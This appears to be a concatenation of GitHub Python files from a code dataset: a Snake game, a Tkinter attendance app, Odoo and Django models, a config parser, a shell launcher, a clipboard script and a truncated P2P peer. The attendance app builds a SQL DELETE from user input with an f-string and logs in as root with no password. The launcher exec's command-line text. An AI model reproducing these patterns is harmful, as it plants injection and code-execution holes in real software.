@classmethod\n async def create(cls, rpc, session):\n result = NodeSyncState()\n try:\n json = await rpc.post(session, 'get_blockchain_state')\n except ApiRequestFailedException:\n return result\n result.available = True\n json = json['blockchain_state']\n synced = json['sync']['synced']\n height = None\n peak = 0\n if not synced:\n peak = json['sync']['sync_tip_height']\n if json['sync']['sync_mode']:\n height = json['sync']['sync_progress_height']\n else:\n peak = json['peak']['height']\n height = peak\n\n result.synced = synced\n result.height = height\n result.peak = peak\n\n return result\n\n def __init__(self):\n self.available = False\n self.synced = False\n self.height = None\n self.peak = 0\n","repo_name":"danielringch/xiamon","sub_path":"xiamon/src/plugins/chianode/nodesyncstate.py","file_name":"nodesyncstate.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} 
+{"seq_id":"10118756086","text":"import pygame\r\nimport random\r\nfrom random import seed\r\nfrom random import randint\r\n\r\npygame.init()\r\nkey2 = 0\r\nW = 500\r\nH = 500\r\nwin = pygame.display.set_mode((W,H))\r\n\r\npygame.display.set_caption(\"Snek :)\")\r\n\r\nwhite = (255, 255, 255)\r\nred = (255, 0, 0)\r\ngreen = (0, 255, 0)\r\n\r\nfont = pygame.font.Font('freesansbold.ttf', 8)\r\nfont2 = pygame.font.Font('freesansbold.ttf', 20)\r\n\r\n\r\nb = False\r\nx = 40\r\ny = 40\r\nwidth = 18\r\nheight = 18\r\nvel = 20\r\nrate = 17\r\nlength = 1\r\ndire = \"R\"\r\ndiretemp = \"R\"\r\ncount = -5\r\ncountcond = 10\r\nscore = 0\r\nrun = True\r\nlevel = 1\r\nprestige = 0\r\ntext = font.render(f'SCORE: {score} PRESTIGE: {prestige}', True, white)\r\ntext1win = font2.render('Congratulations, you beat the game!', True, green)\r\ntext2win = font2.render(\"To play again, press 'space'. To quit, press 9.\", True, green)\r\ntext1lose = font2.render(\"You are as likely to be struck by lightning\", True, red)\r\ntext2lose = font2.render(\"as you are to achieve your dreams.\", True, red)\r\ntext3lose = font2.render(\"Try again with space, 9 to quit.\", True, red)\r\ntextPause = font2.render(\"Press 'u' to unpause.\", True, white)\r\ntextRect = text.get_rect()\r\ntextw1 = text1win.get_rect()\r\ntextw2 = text2win.get_rect()\r\ntextl1 = text1lose.get_rect()\r\ntextl2 = text2lose.get_rect()\r\ntextl3 = text3lose.get_rect()\r\ntextp = textPause.get_rect()\r\ntextRect.center = (80, 8)\r\ntextw1.center = (int(W/2) , int(H/2) - 75)\r\ntextw2.center = (int(W/2) , int(H/2) + 75)\r\ntextl1.center = (int(W/2) , int(H/2) - 100)\r\ntextl2.center = (int(W/2) , int(H/2))\r\ntextl3.center = (int(W/2) , int(H/2) + 100)\r\ntextp.center = (int(W/2) , int(H/2))\r\n\r\n#To Update GameState:\r\ngamebool = True\r\nwinbool = False\r\n\r\n#count is used to make sure the square doesn't move every update. 
it would be way too quick.\r\n#dire is direction, diretemp accepts input from keyboard and updates dire upon refresh of screen.\r\n\r\nmemlist = [[]]*103\r\nmemlist[0] = [x,y]\r\n\r\n#this is for storing positions.\r\n\r\nxf = 240\r\nyf = 260\r\n\r\n#food position\r\ndef gamestatereset():\r\n global x, prestige, yf, xf, memlist, winbool, gamebool, level, run, score, countcond, count, diretemp, dire, length, rate, y\r\n x = 40\r\n y = 40\r\n rate = 17\r\n length = 1\r\n dire = \"R\"\r\n diretemp = \"R\"\r\n count = -5\r\n countcond = 10\r\n score = 0\r\n run = True\r\n level = 1\r\n gamebool = True\r\n if winbool == True:\r\n prestige = prestige + 1\r\n else:\r\n prestige = 0\r\n winbool = False\r\n memlist = [[]]*103\r\n memlist[0] = [x,y]\r\n xf = 240\r\n yf = 260\r\n\r\ndef wincond():\r\n global winbool, gamebool\r\n winbool = True\r\n gamebool = False\r\n\r\ndef winScreen():\r\n global text1win, text2win, textw1, textw2\r\n win.blit(text1win, textw1)\r\n win.blit(text2win, textw2)\r\n\r\ndef losecond():\r\n global gamebool\r\n gamebool = False\r\n\r\ndef loseScreen():\r\n global text1lose, text2lose, text3lose, text3lose, textl1, textl2, textl3 \r\n win.blit(text1lose, textl1)\r\n win.blit(text2lose, textl2)\r\n win.blit(text3lose,textl3)\r\n\r\ndef eat():\r\n global rate, length, memlist, xf, yf, score, level, countcond\r\n if score == 100:\r\n wincond()\r\n length = length + 1\r\n memlist[length-1] = [x , y]\r\n xf = randint(1,24) * 20\r\n yf = randint(1,24) * 20\r\n while [xf,yf] in memlist:\r\n xf = randint(1,24) * 20\r\n yf = randint(1,24) * 20\r\n score = score + 1\r\n if score % 10 == 0:\r\n level = level + 1\r\n rate = rate - 1\r\n if score % 20 == 0:\r\n countcond = countcond - 1\r\n\r\ndef move():\r\n global x, y\r\n #global y\r\n if dire == \"R\":\r\n if x >= 480:\r\n losecond()\r\n else:\r\n x += vel\r\n if dire == \"L\":\r\n if x <= 0:\r\n losecond()\r\n else:\r\n x -= vel\r\n if dire == \"U\":\r\n if y <= 0:\r\n losecond()\r\n else:\r\n y -= vel\r\n if dire == \"D\":\r\n if y >= 480:\r\n losecond()\r\n else:\r\n y += vel\r\n\r\n for i in range(length):\r\n if i == length - 1:\r\n memlist[0] = [x,y]\r\n if i != length - 1:\r\n memlist[length - i - 1] = memlist[length - i - 2]\r\n collcheck()\r\n\r\n\r\ndef collcheck():\r\n global memlist\r\n for i in range(length):\r\n if memlist[0] == memlist[i] and i != 0:\r\n losecond()\r\n \r\ndef dispTEXT():\r\n global text, score\r\n text = font.render(f'SCORE: {score} PRESTIGE: {prestige}', True, white)\r\n win.blit(text,textRect)\r\n\r\ndef PauseScreen():\r\n global textPause, textp, b, key2\r\n win.blit(textPause,textp)\r\n pygame.display.update()\r\n key2 = pygame.key.get_pressed()\r\n\r\n\r\nwhile run:\r\n pygame.time.delay(rate)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_p]:\r\n gamebool = False\r\n b = True\r\n PauseScreen()\r\n \r\n if keys[pygame.K_u]:\r\n gamebool = True\r\n b = False\r\n\r\n if b == True:\r\n continue\r\n \r\n if gamebool == True:\r\n if keys[pygame.K_LEFT]:\r\n if dire == \"R\":\r\n pass\r\n else:\r\n diretemp = \"L\"\r\n if keys[pygame.K_RIGHT]:\r\n if dire == \"L\":\r\n pass\r\n else:\r\n diretemp = \"R\"\r\n if keys[pygame.K_UP]:\r\n if dire == \"D\":\r\n pass\r\n else:\r\n diretemp = \"U\"\r\n if keys[pygame.K_DOWN]:\r\n if dire == \"U\":\r\n pass\r\n else:\r\n diretemp = \"D\"\r\n\r\n \r\n if count <= countcond:\r\n count = count + 1\r\n else:\r\n if memlist[0][0] == xf and memlist[0][1] == 
yf:\r\n eat()\r\n dire = diretemp\r\n move()\r\n count = 1\r\n \r\n win.fill((0,0,0))\r\n dispTEXT()\r\n pygame.draw.rect(win, (255,255,255), (xf + 4, yf + 4,10,10))\r\n \r\n for i in range(length):\r\n if i <= 10:\r\n A = 255 - 10 * i\r\n B = 0\r\n C = 10 * i\r\n if i > 10 and i <= 20:\r\n A = 155 - 5 * (i - 10)\r\n B = 5 * (i - 10)\r\n C = 100\r\n if i > 20 and i <= 30:\r\n A = 105 + (i - 20) * 2\r\n B = 50 + (i - 20) * 10\r\n C = 100 + (i - 20) * 10\r\n if i > 30 and i <= 50:\r\n A = 125 - (i - 30) * 5\r\n B = 150 + (i - 30) * 5\r\n C = 200 + (i - 30) * 1\r\n if i > 50 and i <= 70:\r\n A = 24 + (i - 50) * 9\r\n B = 244 - (i - 50) * 2\r\n C = 224 - (i - 50)\r\n if i > 70:\r\n A = 204 + (i - 70)\r\n B = A\r\n C = A\r\n pygame.draw.rect(win, (A,B,C), (memlist[i][0],memlist[i][1],width,height))\r\n \r\n elif winbool == True:\r\n winScreen()\r\n else:\r\n loseScreen()\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_y]:\r\n losecond()\r\n elif keys[pygame.K_z]:\r\n wincond()\r\n \r\n pygame.display.update()\r\n \r\n keys = pygame.key.get_pressed()\r\n if gamebool == False:\r\n if keys[pygame.K_9]:\r\n quit()\r\n if keys[pygame.K_SPACE]:\r\n gamestatereset()\r\n \r\n \r\n\r\n \r\n\r\npygame.quit()\r\n","repo_name":"Mondonor/snek","sub_path":"MakinSnek.py","file_name":"MakinSnek.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42785693660","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom PIL import ImageTk,Image\nimport os\nimport mysql.connector as mysql\n\n#connecting to database\ndb = mysql.connect(host='localhost',user='root',password='', database='face_recog_attendance_db')\ndbcursor = db.cursor()\n#---------------------------------------------------------------------------------\n\n#buttons container\nclass App:\n def __init__(self, window, window_title):\n self.window = window\n self.window.title(window_title)\n self.window.config(bg=\"#808080\")\n self.window.state(\"zoomed\")\n\n option = {\"padx\":5, \"pady\":5, \"fill\": BOTH}\n #create the left_frame\n self.left_frame = tk.Frame(self.window, bg='#808080')\n self.left_frame.pack(side=LEFT, padx=(150,5),expand=True)\n #self.left_frame.pack_propagate(False) \n self.start_attendance_bttn = Button(self.left_frame, text=\"Start Attendance\", command=self.strt_attendance,width=20)\n self.start_attendance_bttn.pack(side=TOP,**option)\n self.class_info_bttn = Button(self.left_frame, text=\"Class Info\", command=self.view_class_info, width=20)\n self.class_info_bttn.pack(side=TOP,**option)\n self.view_report_bttn = Button(self.left_frame, text=\"View Report\", command=self.report_attendance, width=20)\n self.view_report_bttn.pack(side=TOP, **option)\n self.register_student_bttn = Button(self.left_frame, text=\"Register Student\", command=self.register_student, width=20)\n self.register_student_bttn.pack(side=TOP, **option)\n self.remove_student_bttn = Button(self.left_frame, text=\"Remove Student\", command=self.remove_student)\n self.remove_student_bttn.pack(side=TOP, **option)\n self.logout_bttn = Button(self.left_frame, text=\"Log out\", command=self.logout)\n self.logout_bttn.pack(side=TOP, **option)\n #create the right frame\n self.right_frame = tk.Frame(self.window, bg='#808080',width=660, height=500)\n self.right_frame.pack(side=RIGHT, padx=(0,150), expand=True)\n self.right_frame.pack_propagate(False)\n #place the canvas in a frame \n self.canvas = tk.Canvas(self.right_frame, 
width=645, height=485)\n        self.canvas.pack()\n        self.immesense_logo = ImageTk.PhotoImage(Image.open(\"images/immesense.png\"))\n        self.canvas.create_image(2, 1, anchor=NW, image=self.immesense_logo)\n        \n        # show window\n        self.window.mainloop()\n    #method to start attendance button\n    def strt_attendance(self):\n        self.window.destroy()\n        os.system('py attendance_window.py')\n    #method to view class info\n    def view_class_info(self):\n        self.window.destroy()\n        os.system('py class_info_window.py')\n    #method to attendance_report window\n    def report_attendance(self):\n        self.window.destroy()\n        os.system('py attendance_report_window.py')\n    #method to register student\n    def register_student(self):\n        self.window.destroy()\n        os.system('py registration_window.py')\n    #method to logout \n    def logout(self):\n        self.window.destroy()\n        os.system('py login_window.py')\n#--------------------------------Creating TopLevel Window to remove student------------------------------- \n    def remove_student(self):\n        self.remove_student_window = Toplevel()\n        self.remove_student_window.title(\"REMOVE MEMBER\")\n        self.remove_student_window.geometry(\"600x400\")\n        self.remove_student_window.config(bg='#a6a6a6')\n\n        frame = tk.Frame(self.remove_student_window, background=\"#a6a6a6\")\n        frame.pack()\n        #labels\n        studentID_label = tk.Label(frame, text=\"Enter Student No.:\",font=('Helvetica', 12, 'bold'), bg=\"#a6a6a6\")\n        studentID_label.grid(row=0, column=0, pady=(100,5))\n        #entryboxes\n        self.studentID_entrybx = tk.Entry(frame, width=30,)\n        self.studentID_entrybx.grid(row=0, column=1, pady=(100,5))\n        #buttons\n        remove_button = tk.Button(frame, text=\"Remove\", command = self.remove_stud, width=15)\n        remove_button.grid(row=2, column=1, pady=(50,5))\n        exit_button = tk.Button(frame, text=\"Exit\", command = self.remove_student_window.destroy, width=15)\n        exit_button.grid(row=3, column=1)\n    \n    def remove_stud(self):\n        stud_no = self.studentID_entrybx.get()\n        # quer = f\"SELECT * FROM student WHERE student_no = {stud_no}\"\n        # dbcursor.execute(quer)\n        # student_rec = dbcursor.fetchmany()\n        # for rec in student_rec:\n        #     print(rec)\n        if os.path.exists(\"students_images/\"+ stud_no +\".jpg\"): \n            try:\n                os.remove(\"students_images/\"+ stud_no +\".jpg\")\n                del_query = f\"DELETE FROM student WHERE student_no = '{stud_no}'\"\n                dbcursor.execute(del_query)\n                db.commit()\n                db.close()\n            except Exception as e:\n                messagebox.showerror(\"ERROR\", e)\n                self.remove_student_window.destroy()\n                self.remove_student()\n        else:\n            messagebox.showerror(\"ERROR\", message=\"Check your information provided...\")\n            self.remove_student_window.destroy()\n            self.remove_student()\n        # delete entry in entrybox\n        self.studentID_entrybx.delete(0, END)\n\n\nif __name__== \"__main__\":\n    app = App(tk.Tk(), \"IMMESENSE Face Recognition Attendance System\")\n    \n    ","repo_name":"bomacs/IMMESENSE-","sub_path":"main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20334100867","text":"from openerp import models, fields, api\nimport logging\n\nclass ProductBrand(models.Model):\n    _name = 'product.brand'\n\n    name = fields.Char('Brand Name', required=True)\n    description = fields.Text('Description', translate=True)\n    logo = fields.Binary('Logo File')\n    product_ids = fields.One2many(\n        'product.template',\n        'product_brand_id',\n        string='Brand Products',\n    )\n    products_count = fields.Integer(\n        string='Number of products',\n        
compute='_get_products_count',\n    )\n\n    @api.one\n    @api.depends('product_ids')\n    def _get_products_count(self):\n        self.products_count = len(self.product_ids)\n\n\nclass ProductTemplate(models.Model):\n    _inherit = 'product.template'\n\n    product_brand_id = fields.Many2one(\n        'product.brand',\n        string='Brand',\n        help='Select a brand for this product'\n    )\n","repo_name":"Punto0/addons-fm","sub_path":"product_brand/product_brand.py","file_name":"product_brand.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"169855554","text":"\nfrom django import forms\nfrom blog.models import Post\n\n# NOTE: Not currently used to save data in the database\n\nclass PostForm(forms.ModelForm):\n    class Meta:\n        model = Post\n        # exclude = ['author', 'updated', 'created', ]\n        fields = ['text']\n        widgets = {\n            'text': forms.TextInput(attrs={\n                'id': 'post-text', \n                'required': True, \n                'placeholder': 'Say something...'\n            }),\n        }\n\n\n","repo_name":"ManuData/blog_penv","sub_path":"mysite/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"29238546942","text":"import logging\nimport re\nimport os\nimport warnings\n\nfrom configparser import ConfigParser\nfrom typing import Union, List, Any\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CONFIGDICT(dict):\n    \"\"\"This is a config dict wrapper\"\"\"\n    pass\n    \n\nCONFIG: CONFIGDICT = CONFIGDICT()\n\n\ndef readconfig(filepath: str) -> None:\n    # Make sure we don't accidentally read configurations multiple times\n    if CONFIG:\n        return\n\n    if not os.path.exists(filepath):\n        raise FileNotFoundError(f'No config file exists with the name/path {filepath}.') \n\n    cfg = ConfigParser()\n    # Changing the optionxform enables case preservation of keys in configurations.\n    cfg.optionxform = lambda option: option  # type: ignore\n\n    cfg.read(filepath)\n\n    # Store ENVIRONMENTSPECIFIC key/value pairs outside the CONFIG dict\n    envspecifics: CONFIGDICT = CONFIGDICT()\n\n    # Sections in the config file are flattened, so all configurations are placed on the same level\n    for section in cfg:\n        storedict = envspecifics if section == 'ENVIRONMENTSPECIFIC' else CONFIG\n        \n        for key, value in cfg[section].items():\n            storedict[key] = simplevalueparser(value)\n\n    # Manually set values from the ENVIRONMENTSPECIFIC section based on the ENVIRONMENT variable.\n    for envkey, value in envspecifics.items():\n        try:\n            env = envkey.split('_')[0]\n            key = envkey.split('_')[1]\n        except Exception:\n            warnings.warn(\n                f'Key {envkey} is not a valid ENVIRONMENTSPECIFIC key.'\n            )\n            continue\n\n        if env not in ('DEV', 'PROD'):\n            warnings.warn(\n                f'Environment specifier {env} is not a valid environment. '\n                'Valid options are DEV and PROD.'\n            )\n            continue\n        \n        # Skip all variables which are not for the current ENVIRONMENT\n        if env != CONFIG['ENVIRONMENT']:\n            continue\n        \n        if key in CONFIG:\n            warnings.warn(\n                f'Key {key} is already specified with value {CONFIG[key]}. 
'\n                f'Overwriting the value for the environment-specific value {value}.'\n            )\n\n        # Set the key/value pair\n        CONFIG[key] = value\n\n\ndef simplevalueparser(value: str) -> Union[str, bool, int, float, List[Any]]: \n    # Case: Bools\n    if value.lower() in ['true', 'false']:\n        return value.lower() == 'true'\n    \n    # Case: Numbers\n    # Match any number, which can be represented as <1> and <1.0>\n    digitre = r'-?\d+([.]\d+)?'\n\n    rematch = re.match(digitre, value)\n    # Determine if the value is a number. Second check is to filter out IP addresses, for which\n    # the RE also (partially) matches.\n    if rematch and rematch.span(0)[1] == len(value):\n        return int(value) if rematch.group(1) is None else float(value)\n\n    # Case: List\n    # Base case for lists:\n    if value == '[]':\n        return []\n\n    if len(value) > 2 and value[0] == '[' and value[-1] == ']':\n        result: list = []\n        # All values are themselves cast to their respective types by the simplevalueparser\n        for listvalue in value[1:-1].split(','):\n            result.append(simplevalueparser(listvalue.strip()))\n\n        return result\n\n    # Base case: Return the un-altered string as value\n    return value","repo_name":"CTxD/medid-crawler","sub_path":"source/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40947111037","text":"from dataclasses import dataclass\nimport operator\n\n\n@dataclass(frozen=True, order=True)\nclass Book:\n    title: str\n    author: str\n\n\nbooks = [\n    Book(title=\"1984\", author=\"George Orwell\"),\n    Book(title=\"The Martian Chronicles\", author=\"Ray Bradbury\"),\n    Book(title=\"The Hobbit\", author=\"J.R.R. Tolkien\"),\n    Book(title=\"Animal Farm\", author=\"George Orwell\"),\n    Book(title=\"Fahrenheit 451\", author=\"Ray Bradbury\"),\n    Book(title=\"The Lord of the Rings (1-3)\", author=\"J.R.R. Tolkien\"),\n    Book(title=\"Harry Potter and the Sorcerer’s Stone\", author=\"J.K. Rowling\"),\n    Book(title=\"To Kill a Mockingbird\", author=\"Harper Lee\"),\n]\n","repo_name":"natenka/advpyneng-examples-exercises","sub_path":"examples/15_itertools/groupby_dataclass.py","file_name":"groupby_dataclass.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"}
+{"seq_id":"35778878504","text":"\n\"\"\"\nThis file is meant to be run by croshell.sh / croshell.ps1 and offers commandline arguments. The latter files are not to be confused with croshell.py, which is just the python shell.\n\nArgument Parsing:\n* Script level.\n    * This is system dependent and is hard in bash.\n    * It remains a necessity because at system level one can dictate the environment, the interpreter, etc.\n* Python level:\n    * system agnostic.\n    * Benign syntax, but predetermines to a great extent what is being executed (which python, environment).\n* python library `fire`:\n    * this is good for passing arguments to specific python functions from commandline without writing specific argparsing for those functions.\n\nThe best approach is to use python and fire to process the script's args and:\n * return a string to the script file to execute it.\n * or, execute it via terminal from within python.\n\nChoices made by default:\n* ipython over python\n* interactive is the default\n* importing the file to be run (as opposed to running it as main) is the default. The advantage of running it as an imported module is having reference to the file from which classes came. 
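A class defined under __main__ often cannot be located again when unpickling, whereas one from an imported module can simply be re-imported. 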
This is vital for pickling.\n\n\"\"\"\n\nimport argparse\nimport subprocess\nimport platform\nfrom pathlib import Path\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(description=\"Generic Parser to launch crocodile shell.\")\n\n # POSITIONAL ARGUMENT (UNNAMED)\n # parser.add_argument(\"--read\", \"-file\", dest=\"file\", help=\"binary/python file path to read/interpret.\", default=\"\")\n\n # A FLAG:\n parser.add_argument(\"--module\", '-m', help=\"flag to run the file as a module as opposed to main.\", action=\"store_true\", default=False) # default is running as main, unless indicated by --module flag.\n parser.add_argument(\"--newWindow\", \"-w\", help=\"flag for running in new window.\", action=\"store_true\", default=False)\n parser.add_argument(\"--nonInteratctive\", \"-N\", help=\"flag for a non-interactive session.\", action=\"store_true\", default=False)\n parser.add_argument(\"--python\", \"-p\", help=\"flag to use python over IPython.\", action=\"store_true\", default=False)\n parser.add_argument(\"--fzf\", \"-F\", help=\"search with fuzzy finder for python scripts and run them\", action=\"store_true\", default=False)\n\n # OPTIONAL KEYWORD\n parser.add_argument(\"--version\", \"-v\", help=\"flag to print version.\", action=\"store_true\", default=False)\n parser.add_argument(\"--read\", \"-r\", dest=\"read\", help=\"read a binary file.\", default=\"\")\n parser.add_argument(\"--file\", \"-f\", dest=\"file\", help=\"python file path to interpret\", default=\"\")\n parser.add_argument(\"--cmd\", \"-c\", dest=\"cmd\", help=\"python command to interpret\", default=\"\")\n parser.add_argument(\"--terminal\", \"-t\", dest=\"terminal\", help=f\"specify which terminal to be used. Default console host.\", default=\"\") # can choose `wt`\n parser.add_argument(\"--shell\", \"-S\", dest=\"shell\", help=f\"specify which shell to be used. 
Defaults to CMD.\", default=\"\")\n\n args = parser.parse_args()\n # print(f\"Crocodile.run: args of the firing command = {args.__dict__}\")\n\n # ==================================================================================\n # flags processing\n interactivity = '' if args.nonInteratctive else '-i'\n interpreter = 'python' if args.python else 'ipython'\n\n if args.cmd != \"\":\n import textwrap\n code = f\"from crocodile.toolbox import *\\n{textwrap.dedent(args.cmd)}\"\n exec(code)\n return None # DONE\n elif args.fzf:\n from machineconfig.utils.utils import display_options, P\n file = display_options(msg=\"Choose a python file to run\", options=list(P.cwd().search(\"*.py\", r=True)), fzf=True, multi=False, )\n if len(file) == 0: return None\n res = f\"\"\"ipython --no-banner -i -m crocodile.croshell -- --file \"{file}\" \"\"\"\n elif args.file != \"\" or args.read != \"\":\n code_text = \"\"\n if args.file != \"\":\n file = Path(args.file).expanduser().absolute()\n if args.module:\n code_text = fr\"\"\"\n# >>>>>>> Importing File <<<<<<<<<\nimport sys\nsys.path.append(r'{file.parent}')\nfrom {file.stem} import *\n{args.cmd if args.cmd != '' else ''}\n\"\"\"\n else:\n code_text = f\"\"\"\n# >>>>>>> Executing File <<<<<<<<<\n__file__ = P(r'{file}')\n{file.read_text(encoding=\"utf-8\")}\n\"\"\"\n\n elif args.read != \"\": \n code_text = f\"\"\"\n# >>>>>>> Reading File <<<<<<<<<\np = P(r\\'{str(args.read).lstrip()}\\').absolute()\ntry:\n dat = p.readit()\n if type(dat) == tb.Struct: dat.print(as_config=True, title=p.name)\n else: print(f\"Succcesfully read the file {{p.name}}\")\nexcept Exception as e:\n print(e)\n\n\"\"\"\n\n # next, write code_text to file at ~/tmp_results/shells/python_readfile_script.py using open:\n base = Path.home().joinpath(\"tmp_results/shells\")\n base.mkdir(parents=True, exist_ok=True)\n code_file = base.joinpath(\"python_readfile_script.py\")\n code_file.write_text(code_text, encoding=\"utf-8\")\n res = f\"\"\"ipython --no-banner -i -m crocodile.croshell -- --file \"{code_file}\" \"\"\"\n\n else: # just run croshell.py interactively\n res = f\"{interpreter} {interactivity} --no-banner -m crocodile.croshell\" # --term-title croshell\n # Clear-Host;\n # # --autocall 1 in order to enable shell-like behaviour: e.g.: P x is interpreted as P(x)\n\n if platform.system() == \"Windows\": return subprocess.run([f\"powershell\", \"-Command\", res], shell=True, capture_output=False, text=True)\n else: return subprocess.run([res], shell=True, capture_output=False, text=True)\n\n\nif __name__ == \"__main__\":\n build_parser()\n","repo_name":"thisismygitrepo/crocodile","sub_path":"myresources/crocodile/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73325138347","text":"from game.shared.color import Color\n\n\n\nMAX_X = 900\nMAX_Y = 600\nSCREEN_SIZE_MODIFIER = 2\nCOLUMNS = MAX_X / 22.5\nROWS = MAX_Y / 30\nCELL_SIZE = 15\nFRAME_RATE = 10\nFONT_SIZE = 15\nCAPTION = \"Cycle Game\"\n# the head is one long\nSNAKE_LENGTH = 1\n# the tail is this many long, use a larger number for longer tails/trails on cycle\nTAIL_LENGTH = 63\nWHITE = Color(255, 255, 255)\nRED = Color(255, 0, 0)\nYELLOW = Color(255, 255, 0)\nGREEN = Color(0, 255, 0)\nBLUE = Color(0, 0, 
255)\n","repo_name":"Bambyboi/CSE210-Cycle","sub_path":"cycle/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34499388071","text":"#! /usr/bin/python3\n# mcb.pyw - Saves and loads pieces of text to the clipboard.\n# Usage: python3 mcb.pyw save - Saves clipboard to keyword.\n# python3 mcb.pyw - Loads keyword to clipboard.\n# python3 mcb.pyw list - Loads all keywords to clipboard.\n# python3 mcb.pyw delete - Delete all keyword\n# python3 mcb.pyw delete - Delete keyword\n\nimport shelve, pyperclip, sys\n\nmcbShelf = shelve.open('mcb')\nif len(sys.argv) == 3:\n keyword = sys.argv[2]\n if sys.argv[1].lower() == 'save':\n mcbShelf[keyword] = pyperclip.paste()\n else:\n del mcbShelf[keyword]\nelif len(sys.argv) == 2:\n if sys.argv[1].lower() == 'list':\n pyperclip.copy(str(list(mcbShelf.keys())))\n elif sys.argv[1] in mcbShelf:\n pyperclip.copy(mcbShelf[sys.argv[1]])\n elif sys.argv[1].lower() == 'delete':\n mcbShelf.clear()\n\nmcbShelf.close()\n","repo_name":"pirent/python-playground","sub_path":"automate_stuffs/chapter8/mcb.pyw","file_name":"mcb.pyw","file_ext":"pyw","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12701363216","text":"# pacotes default do python\nimport os # Utilitys do sistema operacional\nimport sys # Para pegar folder no qual os dados estão\nimport glob # Percorre com regex os files de um folder\nimport json # Utilizado para fazer parse da mensagem\nfrom collections import defaultdict # Utilizado como estrutura de dados de um peer para guardar quais peers possuem quais arquivos\nimport random # Utilizado para aceitar randomicamente requisição de download\nimport time # Utilizado para ajustar prints de um peer \nimport socket # Utilizado para criar sockets\nimport threading # Utilizado para fazer as threads\nfrom typing import List, Dict, Tuple # Utilizado para indicar tipos de variáveis\n\n# pacotes não default\nfrom tqdm import tqdm # Utilizado para fazer barra de progresso do download\nfrom message import Message\n\n\nclass Peer:\n\n PEER_ADRESS = socket.gethostbyname(socket.gethostname())\n\n SERVER_ADDRESS = \"127.0.1.1\"\n SERVER_PORT = 10098\n SERVER = (SERVER_ADDRESS, SERVER_PORT)\n BUFFERSIZE = 4096\n\n def __init__(self, file_folder_path, port):\n\n # Define peer\n self.PEER_PORT = int(port)\n self.PEER = (self.PEER_ADRESS, self.PEER_PORT)\n\n # Cria socket TCP\n self.TCPSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.TCPSocket.bind(self.PEER) \n self.TCPSocket.listen()\n\n # Cria socket UDP\n self.UDPClientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n # Variaveis auxiliares\n self.network_peers = defaultdict(lambda:[]) # Guarda quais arquivos cada peer tem\n self.file_folder_path:str = file_folder_path # Guarda pasta onde os arquvios de áudio estão.\n files_path = [file_name for file_name in glob.glob(f\"{file_folder_path}/*\")] # Lista todos os arquivos da pasta\n self.files:str = \" \".join([os.path.basename(file_name) for file_name in files_path]) # String contendo arquivo para transmissão de informação\n self.menu_str:str = \"\\nDigite a requisição [JOIN, SEARCH, DOWNLOAD, LEAVE]:\"\n\n def _handle_download(self):\n while True:\n sender_socket, _ = self.TCPSocket.accept() \n # if below code is executed, that means the sender is connected\n data = sender_socket.recv(self.BUFFERSIZE)\n recv_msg = 
json.loads(data.decode('utf-8'))\n requested_file = recv_msg[\"content\"]\n\n file_path = os.path.join(self.file_folder_path, requested_file)\n thread = threading.Thread(target=self._receive_download, args=(file_path, sender_socket,))\n thread.start()\n thread.join()\n\n def _receive_download(self, file_path, sender_socket):\n\n filesize = os.path.getsize(file_path)\n prop_accept = 0.5\n chance_accept = random.uniform(0,1)\n if chance_accept <= prop_accept:\n msg = Message(content=None, msg_type=\"DOWNLOAD_ACEITO\", sender=self.PEER, extra_info=filesize)\n sender_socket.sendall(msg.to_json(\"utf-8\"))\n #with tqdm(range(filesize), f\"Sending {requested_file}\", unit=\"B\", unit_scale=True, unit_divisor=1024) as progress_bar:\n with open(file_path, \"rb\") as f:\n while True:\n bytes_read = f.read(self.BUFFERSIZE) # Lê bytes do arquivo\n if not bytes_read: \n break # Transmissão do arquivo completa\n\n sender_socket.sendall(bytes_read)\n # progress_bar.update(len(bytes_read))\n else:\n msg = Message(content=None, msg_type=\"DOWNLOAD_NEGADO\", sender=self.PEER, extra_info=filesize)\n sender_socket.sendall(msg.to_json(\"utf-8\"))\n\n sender_socket.close()\n\n \n \n def _receive(self):\n while True:\n data, _ = self.UDPClientSocket.recvfrom(self.BUFFERSIZE)\n recv_msg = json.loads(data.decode('utf-8')) # Transforma json em dict\n thread = threading.Thread(target=self._handle_request, args=(recv_msg,))\n thread.start()\n thread.join()\n\n def _handle_request(self, recv_msg):\n\n peer = tuple(recv_msg[\"sender\"]) # Peer que fez a requisição\n msg_type = recv_msg[\"msg_type\"] # Tipo de requisição\n content = recv_msg[\"content\"] # Conteúdo da requisição\n\n if msg_type == \"JOIN_OK\":\n self._handle_join()\n\n elif msg_type == \"UPDATE_OK\":\n self._handle_update()\n\n elif msg_type == 